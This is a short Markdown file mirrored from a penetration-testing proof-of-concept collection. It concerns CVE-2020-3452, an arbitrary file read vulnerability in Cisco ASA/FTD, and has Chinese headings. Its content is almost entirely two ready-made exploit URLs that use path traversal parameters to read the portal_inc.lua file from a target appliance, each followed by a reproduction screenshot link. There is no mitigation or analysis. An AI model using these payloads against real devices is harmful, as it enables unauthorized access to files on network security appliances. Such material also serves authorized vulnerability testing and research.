mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-07-30 14:34:31 +00:00
23 lines
485 B
Markdown
23 lines
485 B
Markdown
CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞
|
||
|
||
POC:one:
|
||
|
||
```
|
||
For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
|
||
```
|
||
|
||
|
||
|
||
漏洞复现情况如下:
|
||
|
||
|
||
|
||
POC:two:
|
||
|
||
```
|
||
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
|
||
```
|
||
|
||
漏洞复现情况如下:
|
||
|
||
 |